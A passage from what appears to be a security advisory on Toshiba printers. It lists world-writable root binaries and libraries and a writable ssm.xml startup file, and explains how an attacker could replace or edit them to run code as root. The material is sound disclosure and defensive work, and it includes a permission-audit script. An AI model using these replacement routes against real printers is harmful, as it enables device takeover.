-rwxrwxrwx 1 root root 269419 Dec  6 04:02 /home/SYSROM_SRC/build/release/bin/sim
-rwxrwxrwx 1 root root 258577 Dec  6 04:02 /home/SYSROM_SRC/build/release/bin/sljobmanagement
-rwxrwxrwx 1 root root 32089 Mar 14 16:28 /home/SYSROM_SRC/build/release/bin/ssdktimestamp
-rwxrwxrwx 1 root root 5986687 Dec  6 04:07 /home/SYSROM_SRC/build/release/bin/wfpc
-rwxrwxrwx 1 root root 78627 Dec  6 02:00 /home/SYSROM_SRC/bin/alllmnr
-rwxrwxrwx 1 root root 68223 Dec  6 01:57 /home/SYSROM_SRC/bin/dnsValidateDaemon
-rwxrwxrwx 1 root root 104184 Dec  6 01:48 /home/SYSROM_SRC/bin/eBXDebugLogUtility
-rwxrwxrwx 1 root root 76674 Dec  6 02:01 /home/SYSROM_SRC/bin/ipv6_daemon
-rwxrwxrwx 1 root root 28318 Dec  6 01:40 /home/SYSROM_SRC/bin/mapper
-rwxrwxrwx 1 root root 167219 Dec  6 01:48 /home/SYSROM_SRC/bin/syscallerr
-rwxrwxrwx 1 root root 316382 Dec  6 02:03 /home/SYSROM_SRC/build/release/bin/aleSCL
-rwxrwxrwx 1 root root 21142 Dec  6 02:01 /home/SYSROM_SRC/build/release/bin/alftpprintd
-rwxrwxrwx 1 root root 243145 Dec  6 01:53 /home/SYSROM_SRC/build/release/bin/alhp9100
-rwxrwxrwx 1 root root 84257 Dec  6 01:56 /home/SYSROM_SRC/build/release/bin/allld2d
-rwxrwxrwx 1 root root 270934 Dec  6 01:53 /home/SYSROM_SRC/build/release/bin/allprng
-rwxrwxrwx 1 root root 389522 Dec  6 02:02 /home/SYSROM_SRC/build/release/bin/alnetefiRemoteifsr
-rwxrwxrwx 1 root root 15176259 Dec  6 03:39 /home/SYSROM_SRC/build/release/bin/alstage2
-rwxrwxrwx 1 root root 126466 Dec  6 02:01 /home/SYSROM_SRC/build/release/bin/alusbPrint
-rwxrwxrwx 1 root root 1419229 Dec  6 02:01 /home/SYSROM_SRC/build/release/bin/faxmilter
-rwxrwxrwx 1 root root 21638 Dec  6 03:28 /home/SYSROM_SRC/build/release/bin/snmp_watchdog
-rwxrwxrwx 1 apache messagebus 656546 Dec  6 01:34 /usr/local/ebx/bin/httpd
-rwxrwxrwx 1 apache messagebus 665612 Dec  6 01:34 /usr/local/ebx/httpd_worker/bin/httpd_worker

The previous command also returns symlinks, which we can analyze separately (ls -la on a symlink shows the link itself, not its target). Following them confirms that the targets are equally vulnerable because of insecure permissions:

lrwxrwxrwx 1 root root 35 Mar 14 16:27 /home/SYSROM_SRC/bin/dibbler-client -> ../../thirdparty/bin/dibbler-client
lrwxrwxrwx 1 root root 26 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/alipp -> ../../thirdparty/bin/alipp
lrwxrwxrwx 1 root root 39 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/mDNSResponderPosix -> ../../thirdparty/bin/mDNSResponderPosix
lrwxrwxrwx 1 root root 25 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/nqcs -> ../../thirdparty/bin/nqcs
lrwxrwxrwx 1 root root 25 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/nqnd -> ../../thirdparty/bin/nqnd
lrwxrwxrwx 1 root root 30 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/slapd -> ../../thirdparty/libexec/slapd
lrwxrwxrwx 1 root root 27 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/snmpd -> ../../thirdparty/sbin/snmpd
lrwxrwxrwx 1 root root 27 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/vsftpd -> ../../thirdparty/bin/vsftpd
lrwxrwxrwx 1 root root 27 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/python -> ../../thirdparty/bin/python

bash-4.1# for i in dibbler-client alipp mDNSResponderPosix nqcs nqnd vsftpd python; do ls -la /home/SYSROM_SRC/build/thirdparty/bin/$i;done
-rwxrwxrwx 1 root root 11339780 Dec 6 01:38 /home/SYSROM_SRC/build/thirdparty/bin/dibbler-client
-rwxrwxrwx 1 apache messagebus 653763 Dec 6 01:40 /home/SYSROM_SRC/build/thirdparty/bin/alipp
-rwxrwxrwx 1 root root 429709 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/bin/mDNSResponderPosix
-rwxrwxrwx 1 apache messagebus 1342015 Dec 6 01:35 /home/SYSROM_SRC/build/thirdparty/bin/nqcs
-rwxrwxrwx 1 apache messagebus 501752 Dec 6 01:35 /home/SYSROM_SRC/build/thirdparty/bin/nqnd
-rwxrwxrwx 1 root root 232030 Dec 6 01:34 /home/SYSROM_SRC/build/thirdparty/bin/vsftpd

lrwxrwxrwx 1 root root 7 Mar 14 16:27 /home/SYSROM_SRC/build/thirdparty/bin/python -> python3
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/libexec/slapd
-rwxrwxrwx 1 root root 1709140 Dec 6 01:34 /home/SYSROM_SRC/build/thirdparty/libexec/slapd
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/sbin/snmpd
-rwxrwxrwx 1 apache messagebus 41801 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/sbin/snmpd
bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin/python3
lrwxrwxrwx 1 root root 28 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/python3 -> ../../thirdparty/bin/python3
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/bin/python3
lrwxrwxrwx 1 root root 9 Mar 14 16:27 /home/SYSROM_SRC/build/thirdparty/bin/python3 -> python3.5
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/bin/python3.5
-rwxrwxrwx 1 root root 20997 Dec 6 01:28 /home/SYSROM_SRC/build/thirdparty/bin/python3.5
bash-4.1#

An attacker can remotely compromise any Toshiba printer.

Any local or remote attacker can replace these programs with malicious ones.

Details – Local Privilege Escalation and Remote Code Execution using insecure permissions on libraries

Several vendor-specific programs run inside the Toshiba printers. These programs run as root and load code from shared libraries that have insecure permissions (777), which allows an attacker to replace those libraries with malicious ones. This local privilege escalation can also be turned into remote code execution: a malicious library can be uploaded through the pre-authentication remote code execution as root or apache, combined with the multiple local privilege escalation vulnerabilities.

Example: /home/SYSROM_SRC/bin/syscallerr

The /home/SYSROM_SRC/bin/syscallerr program is executed periodically as root. In the output of pspy32 below, we can see it being launched as UID 0:

2023/05/27 16:13:35 CMD: UID=0 PID=31370 | sh -c du -cb /work/log/corefiles/core.* 2> /dev/null | grep total | awk '{print $1}'
2023/05/27 16:13:35 CMD: UID=0 PID=31373 | sh -c du -cb /work/log/corefiles/core.* 2> /dev/null | grep total | awk '{print $1}'
2023/05/27 16:13:35 CMD: UID=0 PID=31372 | grep total
2023/05/27 16:13:35 CMD: UID=0 PID=31371 | sh -c du -cb /work/log/corefiles/core.* 2> /dev/null | grep total | awk '{print $1}'
2023/05/27 16:13:35 CMD: UID=0 PID=31374 | /home/SYSROM_SRC/bin/syscallerr
2023/05/27 16:13:35 CMD: UID=0 PID=31376 | awk {print}
2023/05/27 16:13:35 CMD: UID=0 PID=31375 |
2023/05/27 16:13:35 CMD: UID=0 PID=31377 | sh -c ps -e | grep ebx_dl
2023/05/27 16:13:35 CMD: UID=0 PID=31379 | grep ebx_dl
2023/05/27 16:13:35 CMD: UID=0 PID=31378 | ps -e
2023/05/27 16:13:35 CMD: UID=0 PID=31380 | /home/SYSROM_SRC/bin/syscallerr
2023/05/27 16:13:35 CMD: UID=0 PID=31383 | sh -c ps -e | grep ebx_dl | awk '{print $5}'
2023/05/27 16:13:35 CMD: UID=0 PID=31382 |
2023/05/27 16:13:35 CMD: UID=0 PID=31381 | ps -e
2023/05/27 16:13:35 CMD: UID=0 PID=31384 | sh -c ps -e | grep cissm
2023/05/27 16:13:35 CMD: UID=0 PID=31386 | grep cissm
2023/05/27 16:13:35 CMD: UID=0 PID=31385 | ps -e
2023/05/27 16:13:35 CMD: UID=0 PID=31387 | sh -c dd if=/dev/mtdblock1 of=/ramdisk/FROM_SERIAL > /dev/null 2>&1
2023/05/27 16:13:35 CMD: UID=0 PID=31388 | dd if=/dev/mtdblock1 of=/ramdisk/FROM_SERIAL
2023/05/27 16:13:35 CMD: UID=0 PID=31389 | sh -c ps -e | grep ebx_dl
2023/05/27 16:13:35 CMD: UID=0 PID=31391 | grep ebx_dl

When analyzing this program, we find several shared libraries that it loads; their code will execute as root.

We find the vulnerable shared library already discussed in the LD_PRELOAD finding:

  • /ramdisk/al/libGetNameInfoInterface.so

We also find several other libraries being loaded:

bash-4.1# ldd /home/SYSROM_SRC/bin/syscallerr
linux-gate.so.1 => (0x777c0000)
/ramdisk/al/libGetNameInfoInterface.so (0x777b1000)
/ramdisk/al/libGetAddtInfoInterface.so (0x777a0000)
libpthread.so.0 => /lib/libpthread.so.0 (0x77780000)
libsqlite3.so.0 => /usr/lib/libsqlite3.so.0 (0x4be4c000)
libciindexeddb.so => /home/SYSROM_SRC/build/release/lib/libciindexeddb.so (0x77729000)
libsyscallerr.so => /home/SYSROM_SRC/build/release/lib/libsyscallerr.so (0x77720000)
libcios.so => /home/SYSROM_SRC/build/release/lib/libcios.so (0x776ad000)
libatawrapper.so.0 => /mfp/lib/libatawrapper.so.0 (0x7768b000)
libmfpcommonwrapper.so.0 => /mfp/lib/libmfpcommonwrapper.so.0 (0x77682000)
libcrypto.so.1.0.0 => /home/SYSROM_SRC/build/release/lib/libcrypto.so.1.0.0 (0x77420000)
libstdc++.so.6 => /usr/lib/libstdc++.so.6 (0x4c04f000)
libgcc_s.so.1 => /lib/libgcc_s.so.1 (0x4c14b000)
libintlc.so.5 => /usr/lib/libintlc.so.5 (0x773c3000)
libsvml.so => /mfp/lib/libsvml.so (0x76ba9000)
libc.so.6 => /lib/libc.so.6 (0x4bc67000)
libdl.so.2 => /lib/libdl.so.2 (0x4bdaf000)
libllmnrclient.so => /home/SYSROM_SRC/build/release/lib/libllmnrclient.so (0x76b95000)
/lib/ld-linux.so.2 (0x4bc47000)
libsqlite.so.0 => /home/SYSROM_SRC/build/release/lib/libsqlite.so.0 (0x76b35000)
libcpanel.so.0 => /mfp/lib/libcpanel.so.0 (0x76b0e000)
libcimsg.so => /home/SYSROM_SRC/build/release/lib/libcimsg.so (0x76b02000)
libcissmclient.so => /home/SYSROM_SRC/build/release/lib/libcissmclient.so (0x76ae8000)
libacl.so.1 => /lib/libacl.so.1 (0x4bdd7000)
librt.so.1 => /lib/librt.so.1 (0x4be15000)
libm.so.6 => /lib/libm.so.6 (0x76abf000)
libssdk.so.0 => /home/SYSROM_SRC/build/release/lib/libssdk.so.0 (0x75f1e000)
libcihdb.so => /home/SYSROM_SRC/build/release/lib/libcihdb.so (0x75e56000)
libattr.so.1 => /lib/libattr.so.1 (0x4bdd0000)
libpam.so.0 => /lib/libpam.so.0 (0x75e4a000)
libldap-2.4.so.2 => /home/SYSROM_SRC/build/release/lib/libldap-2.4.so.2 (0x75e12000)
libssl.so.1.0.0 => /home/SYSROM_SRC/build/release/lib/libssl.so.1.0.0 (0x75da6000)
libk5crypto.so.3 => /usr/lib/libk5crypto.so.3 (0x75d84000)
libresolv.so.2 => /lib/libresolv.so.2 (0x4c164000)
libext2fs.so.2 => /usr/lib/libext2fs.so.2 (0x75d5a000)
libuuid.so.1 => /usr/lib/libuuid.so.1 (0x4be0f000)
libkrb5support.so.0 => /usr/lib/libkrb5support.so.0 (0x75d53000)
libkrb5.so.25 => /home/SYSROM_SRC/build/release/lib/libkrb5.so.25 (0x75ce2000)
libgssapi.so.2 => /home/SYSROM_SRC/build/release/lib/libgssapi.so.2 (0x75cae000)
libCryptolib.so.0 => /home/SYSROM_SRC/build/release/lib/libCryptolib.so.0 (0x75c2b000)
libirng.so => /usr/lib/libirng.so (0x75c22000)
libcilkrts.so.5 => /usr/lib/libcilkrts.so.5 (0x75bee000)
libexpat.so.1 => /usr/lib/libexpat.so.1 (0x4c403000)
libcrypt.so.1 => /lib/libcrypt.so.1 (0x75bbc000)
liblber-2.4.so.2 => /home/SYSROM_SRC/build/release/lib/liblber-2.4.so.2 (0x75bb0000)
libsasl2.so.2 => /home/SYSROM_SRC/build/release/lib/libsasl2.so.2 (0x75b8c000)
libcom_err.so.2 => /usr/lib/libcom_err.so.2 (0x4bdee000)
libhx509.so.5 => /home/SYSROM_SRC/build/release/lib/libhx509.so.5 (0x75b4b000)
libheimsqlite.so.0 => /home/SYSROM_SRC/build/release/lib/libheimsqlite.so.0 (0x75ad7000)
libhcrypto.so.4 => /home/SYSROM_SRC/build/release/lib/libhcrypto.so.4 (0x75aa4000)
libasn1.so.8 => /home/SYSROM_SRC/build/release/lib/libasn1.so.8 (0x75a02000)
libwind.so.0 => /home/SYSROM_SRC/build/release/lib/libwind.so.0 (0x759da000)
libcom_err.so.1 => /home/SYSROM_SRC/build/release/lib/libcom_err.so.1 (0x759d6000)
libroken.so.18 => /home/SYSROM_SRC/build/release/lib/libroken.so.18 (0x759c2000)
libheimntlm.so.0 => /home/SYSROM_SRC/build/release/lib/libheimntlm.so.0 (0x759bc000)
bash-4.1#

We can identify these 31 insecure libraries (the list as captured contains libsqlite.so.0.8.6 and libcimsg.so.0 twice):

  • /home/SYSROM_SRC/build/release/lib/libciindexeddb.so.0

  • /home/SYSROM_SRC/build/release/lib/libsyscallerr.so.0

  • /home/SYSROM_SRC/build/release/lib/libcios.so.0

  • /mfp/lib/libatawrapper.so.0.0

  • /mfp/lib/libmfpcommonwrapper.so.0.0

  • /home/SYSROM_SRC/build/thirdparty/lib/libcrypto.so.1.0.0

  • /mfp/lib/libsvml.so

  • /home/SYSROM_SRC/build/release/lib/libllmnrclient.so.0

  • /home/SYSROM_SRC/build/thirdparty/lib/libsqlite.so.0.8.6

  • /mfp/lib/libcpanel.so.0.0

  • /home/SYSROM_SRC/build/release/lib/libcimsg.so.0

  • /home/SYSROM_SRC/build/thirdparty/lib/libsqlite.so.0.8.6

  • /home/SYSROM_SRC/build/release/lib/libcimsg.so.0

  • /home/SYSROM_SRC/build/release/lib/libcissmclient.so.0

  • /home/SYSROM_SRC/build/release/lib/libssdk.so.0.0.0

  • /home/SYSROM_SRC/build/release/lib/libcihdb.so.0

  • /home/SYSROM_SRC/build/thirdparty/lib/libldap-2.4.so.2.5.6

  • /home/SYSROM_SRC/build/thirdparty/lib/libssl.so.1.0.0

  • /home/SYSROM_SRC/build/thirdparty/lib/libgssapi.so.2.0.0

  • /home/SYSROM_SRC/build/thirdparty/lib/libkrb5.so.25.0.0

  • /home/SYSROM_SRC/NoBuildItems/common/lib/libCryptolib.so.0

  • /home/SYSROM_SRC/NoBuildItems/common/lib/libCryptolib.so.0.0.0

  • /home/SYSROM_SRC/build/thirdparty/lib/liblber-2.4.so.2.5.6

  • /home/SYSROM_SRC/build/thirdparty/lib/libhx509.so.5.0.0

  • /home/SYSROM_SRC/build/thirdparty/lib/libheimsqlite.so.0.0.0

  • /home/SYSROM_SRC/build/thirdparty/lib/libhcrypto.so.4.1.0

  • /home/SYSROM_SRC/build/thirdparty/lib/libasn1.so.8.0.0

  • /home/SYSROM_SRC/build/thirdparty/lib/libwind.so.0.0.0

  • /home/SYSROM_SRC/build/thirdparty/lib/libcom_err.so.1.1.3

  • /home/SYSROM_SRC/build/thirdparty/lib/libroken.so.18.1.0

  • /home/SYSROM_SRC/build/thirdparty/lib/libheimntlm.so.0.1.0

These libraries have insecure permissions and can be overwritten by a remote attacker to achieve remote code execution (note that libcrypto and libssl are even owned by apache:messagebus):

-rwxrwxrwx 1 root root 322261 Dec  6 01:41 /home/SYSROM_SRC/build/release/lib/libciindexeddb.so.0
-rwxrwxrwx 1 root root 343680 Dec 6 01:48 /home/SYSROM_SRC/build/release/lib/libsyscallerr.so.0
-rwxrwxrwx 1 root root 566991 Dec 6 01:41 /home/SYSROM_SRC/build/release/lib/libcios.so.0
-rwxrwxrwx 1 root root 139986 Sep 19 2019 /mfp/lib/libatawrapper.so.0.0
-rwxrwxrwx 1 root root 38330 May 28 2019 /mfp/lib/libmfpcommonwrapper.so.0.0
-rwxrwxrwx 1 apache messagebus 2765203 Dec 6 01:28 /home/SYSROM_SRC/build/thirdparty/lib/libcrypto.so.1.0.0
-rwxrwxrwx 1 root root 9479623 Apr 25 2014 /mfp/lib/libsvml.so
-rwxrwxrwx 1 root root 95211 Dec 6 02:00 /home/SYSROM_SRC/build/release/lib/libllmnrclient.so.0
-rwxrwxrwx 1 root root 744984 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libsqlite.so.0.8.6
-rwxrwxrwx 1 root root 48131 Apr 8 2019 /mfp/lib/libcpanel.so.0.0
-rwxrwxrwx 1 root root 58976 Dec 6 01:41 /home/SYSROM_SRC/build/release/lib/libcimsg.so.0
-rwxrwxrwx 1 root root 744984 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libsqlite.so.0.8.6
-rwxrwxrwx 1 root root 58976 Dec 6 01:41 /home/SYSROM_SRC/build/release/lib/libcimsg.so.0
-rwxrwxrwx 1 root root 127850 Dec 6 01:41 /home/SYSROM_SRC/build/release/lib/libcissmclient.so.0
-rwxrwxrwx 1 root root 14101772 Dec 6 01:40 /home/SYSROM_SRC/build/release/lib/libssdk.so.0.0.0
-rwxrwxrwx 1 root root 909064 Dec 6 01:41 /home/SYSROM_SRC/build/release/lib/libcihdb.so.0
-rwxrwxrwx 1 root root 269392 Dec 6 01:34 /home/SYSROM_SRC/build/thirdparty/lib/libldap-2.4.so.2.5.6
-rwxrwxrwx 1 apache messagebus 485480 Dec 6 01:28 /home/SYSROM_SRC/build/thirdparty/lib/libssl.so.1.0.0
-rwxrwxrwx 1 root root 251701 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libgssapi.so.2.0.0
-rwxrwxrwx 1 root root 539700 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libkrb5.so.25.0.0
-rwxrwxrwx 1 root root 624082 Dec 6 04:53 /home/SYSROM_SRC/NoBuildItems/common/lib/libCryptolib.so.0
-rwxrwxrwx 1 root root 624082 Apr 20 2018 /home/SYSROM_SRC/NoBuildItems/common/lib/libCryptolib.so.0.0.0
-rwxrwxrwx 1 root root 60708 Dec 6 01:34 /home/SYSROM_SRC/build/thirdparty/lib/liblber-2.4.so.2.5.6
-rwxrwxrwx 1 root root 324233 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libhx509.so.5.0.0
-rwxrwxrwx 1 root root 525228 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libheimsqlite.so.0.0.0
-rwxrwxrwx 1 root root 225346 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libhcrypto.so.4.1.0
-rwxrwxrwx 1 root root 759349 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libasn1.so.8.0.0
-rwxrwxrwx 1 root root 166289 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libwind.so.0.0.0
-rwxrwxrwx 1 root root 14571 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libcom_err.so.1.1.3
-rwxrwxrwx 1 root root 92942 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libroken.so.18.1.0
-rwxrwxrwx 1 root root 24134 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libheimntlm.so.0.1.0

An attacker can remotely compromise any Toshiba printer.

The libraries used by these programs (several hundred of them) can be replaced with malicious libraries by any local or remote attacker.
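The check behind both findings above, the world-writable binaries running as root and the world-writable libraries that syscallerr loads, as an added Python example (not Toshiba's code and not from the original advisory). It resolves symlinks before looking at the mode, which the `which`-based loop above does not, parses ldd output in the format shown above, and additionally flags a world-writable, non-sticky parent directory, since a file in such a directory can be renamed away and replaced. It avoids f-strings so that it also runs on the device's python3.5. The sample ldd text and the temporary directory tree are constructed here for the offline check; the script name in the usage note is assumed.

```python
"""Audit a program and every shared library it loads for world-writable
permissions (the condition behind the binary and library findings above).
Added example, not Toshiba code. Resolves symlinks, so release/bin/snmpd is
judged by the mode of ../../thirdparty/sbin/snmpd."""
import os
import re
import stat
import subprocess
import tempfile

# ldd prints "name => /path (0xaddr)" for normal dependencies and just
# "/path (0xaddr)" for LD_PRELOAD entries and the dynamic loader itself.
# Entries without a path (the vDSO, "not found") are skipped.
_LDD_LINE = re.compile(r'^\s*(?:\S+\s+=>\s+)?(/\S+)\s+\(0x[0-9a-fA-F]+\)')

# Constructed from a few lines of the syscallerr ldd output above.
SAMPLE_LDD = """\
    linux-gate.so.1 =>  (0x777c0000)
    /ramdisk/al/libGetNameInfoInterface.so (0x777b1000)
    libpthread.so.0 => /lib/libpthread.so.0 (0x77780000)
    libcios.so => /home/SYSROM_SRC/build/release/lib/libcios.so (0x776ad000)
    /lib/ld-linux.so.2 (0x4bc47000)
"""


def parse_ldd(text):
    """Return the absolute library paths named in ldd output, in order."""
    return [m.group(1) for m in (_LDD_LINE.match(l) for l in text.splitlines()) if m]


def run_ldd(exe):
    """Run the system ldd on an executable (used when no ldd text is given)."""
    out = subprocess.run(['ldd', exe], stdout=subprocess.PIPE,
                         universal_newlines=True, check=True).stdout
    return parse_ldd(out)


def writable_reasons(path):
    """Return (resolved_path, reasons) explaining why an unprivileged user
    could replace the file: a world-writable mode, or a world-writable
    ancestor directory without the sticky bit (rename the file away, drop a
    new one in its place). 'missing' means ldd named a path that is absent."""
    real = os.path.realpath(path)
    try:
        st = os.stat(real)
    except OSError:
        return real, ['missing']
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append('file mode {:o}'.format(stat.S_IMODE(st.st_mode)))
    d = os.path.dirname(real)
    while True:
        dm = os.stat(d).st_mode
        if dm & stat.S_IWOTH and not dm & stat.S_ISVTX:
            reasons.append('parent dir {} mode {:o}'.format(d, stat.S_IMODE(dm)))
        parent = os.path.dirname(d)
        if parent == d:
            break
        d = parent
    return real, reasons


def audit(paths):
    """Map each replaceable resolved path to its reasons; clean files are omitted."""
    findings = {}
    for p in paths:
        real, reasons = writable_reasons(p)
        if reasons:
            findings[real] = reasons
    return findings


def audit_program(exe, ldd_text=None):
    """Audit an executable together with everything ldd says it will load."""
    libs = parse_ldd(ldd_text) if ldd_text is not None else run_ldd(exe)
    return audit([exe] + libs)


def make_sample_tree():
    """Test fixture: a throwaway tree mimicking the printer layout, with a
    777 binary reached through a relative symlink (like release/bin/snmpd),
    a 755 binary, a 777 library, and an ldd-style line naming that library."""
    base = os.path.realpath(tempfile.mkdtemp(prefix='mfp-audit-'))
    bad = os.path.join(base, 'thirdparty', 'sbin', 'snmpd')
    good = os.path.join(base, 'bin', 'safe')
    lib = os.path.join(base, 'lib', 'libcios.so.0')
    link = os.path.join(base, 'release', 'bin', 'snmpd')
    for p, mode in ((bad, 0o777), (good, 0o755), (lib, 0o777)):
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, 'wb') as fh:
            fh.write(b'\x7fELF')
        os.chmod(p, mode)
    os.makedirs(os.path.dirname(link), exist_ok=True)
    os.symlink(os.path.relpath(bad, os.path.dirname(link)), link)
    return {'link': link, 'bad': bad, 'good': good, 'lib': lib,
            'ldd': 'libcios.so => {} (0x776ad000)\n'.format(lib)}


if __name__ == '__main__':
    import sys
    for exe in sys.argv[1:] or ['/home/SYSROM_SRC/bin/syscallerr']:
        for path, why in sorted(audit_program(exe).items()):
            print('{}: {}'.format(path, ', '.join(why)))
```

Run on the printer as `python3 audit.py /home/SYSROM_SRC/bin/syscallerr` (assumed file name) to reproduce the library list above; feeding it the `ps`-derived executable list reproduces the binary list. A path reported as 'missing' is one that ldd printed but that does not exist on the host where the script runs, which is what happens when the ldd output is copied off the device.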

Details – Local Privilege Escalation and Remote Code Execution using CISSM

We found that the cissm program runs as root inside the printer. This Toshiba-specific program starts child processes according to the contents of an XML file stored on the printer, /home/SYSROM_SRC/build/common/bin/ssm.xml, as shown below:

bash-4.1# ps auxw | grep cissm
root      1487  0.0  0.3  53496 10184 ?        Sl   16:34   0:02 ./cissm -T 7 -d ssm.xml
bash-4.1# pstree
[...]
     |-cissm-+-alAddressBookMg
     |       |-alCloning
     |       |-alExportImport
     |       |-alLogRetriever
     |       |-alLogmanager---{alLogmanager}
     |       |-alPanelStartLED---{alPanelStartLE}
     |       |-alPanelUIMessag---{alPanelUIMessa}
     |       |-alServiceUIPlug
     |       |-alUiFrameWork---24*[{alUiFrameWork}]
     |       |-alViewPlugin---3*[{alViewPlugin}]
     |       |-alaccountmgr---2*[{alaccountmgr}]
     |       |-alappmanager-+-2*[python---5*[{python}]]
     |       |              `-15*[{alappmanager}]
     |       |-alboserver---7*[{alboserver}]
     |       |-alcbamanager---26*[{alcbamanager}]
     |       |-aldevauthmgmtpl
     |       |-aldeviceconfigp
     |       |-aldeviceservice---{aldeviceservic}
     |       |-aleFilingmgr
     |       |-alfilestoragem
     |       |-algrpmgr
     |       |-alhddalertmgr
     |       |-alhddbackuprest
     |       |-alhomedatamgr
     |       |-alifaxreceive
     |       |-alintegritychkm
     |       |-aljobcontroller---8*[{aljobcontrolle}]
[...]

The ssm.xml that cissm loads is reached through a symlink chain (release/bin/ssm.xml -> thirdparty/bin/ssm.xml -> common/bin/ssm.xml) ending at /home/SYSROM_SRC/build/common/bin/ssm.xml, and that file has insecure permissions:

bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin/ssm.xml /home/SYSROM_SRC/build/thirdparty/bin/ssm.xml /home/SYSROM_SRC/build/common/bin/ssm.xml
-rwxrwxrwx 1 root root 55245 Oct  7  2021 /home/SYSROM_SRC/build/common/bin/ssm.xml
lrwxrwxrwx 1 root root    28 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/ssm.xml -> ../../thirdparty/bin/ssm.xml
lrwxrwxrwx 1 root root    24 Mar 14 16:27 /home/SYSROM_SRC/build/thirdparty/bin/ssm.xml -> ../../common/bin/ssm.xml

This file is used to run programs as root when the printer starts, and it can be used to redefine any program that runs as root at startup. cissm itself is re-executed every two to three minutes (see the pspy32 capture below), so a modified file is picked up without waiting for a reboot.

An attacker can remotely write an additional entry that launches a malicious command, which will then be executed as root when the printer starts:

Contents of /home/SYSROM_SRC/build/common/bin/ssm.xml:

<?xml version="1.0" encoding="UTF-8"?>
<SSM xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="../../../LayerInterface/CI/ServiceStartupManager/SSM.xsd">
<!-- Start: CI Layer services -->
<Service>
<name>cischeduler</name>
<group/>
<exePath>./cischeduler</exePath>
<startupType>Automatic</startupType>
<enabled>1</enabled>
<ProcessGroup>TRUSTED</ProcessGroup>
<StartParameters>
<Param>-S</Param>
<Param>ramdisk</Param>
<Param>&gt;</Param>
<Param>/work/log/ci/cischeduler.log</Param>
</StartParameters>
</Service>
<Service>
<name>cipollproc</name>
<group/>
<exePath>./cipollproc</exePath>
<startupType>Automatic</startupType>
<enabled>1</enabled>
<ProcessGroup>TRUSTED</ProcessGroup>
<StartParameters>
<Param>&gt;</Param>
<Param>/work/log/ci/cipollproc.log</Param>
</StartParameters>
<StartupCondition>
<Condition>
<Service name="cischeduler" state="Ready"></Service>
</Condition>
</StartupCondition>
</Service>
[...]

Analysis of the running printer with pspy32. cissm is re-executed every few minutes; between its restarts the capture also shows a root watch -n 3 loop that executes /root/sshd_start.sh whenever that file exists:

2023/05/27 20:32:43 CMD: UID=0 PID=4228 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:43 CMD: UID=0 PID=4229 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:46 CMD: UID=0 PID=4230 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:46 CMD: UID=0 PID=4231 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:50 CMD: UID=0 PID=4232 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:50 CMD: UID=0 PID=4233 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:53 CMD: UID=0 PID=4234 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:53 CMD: UID=0 PID=4235 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
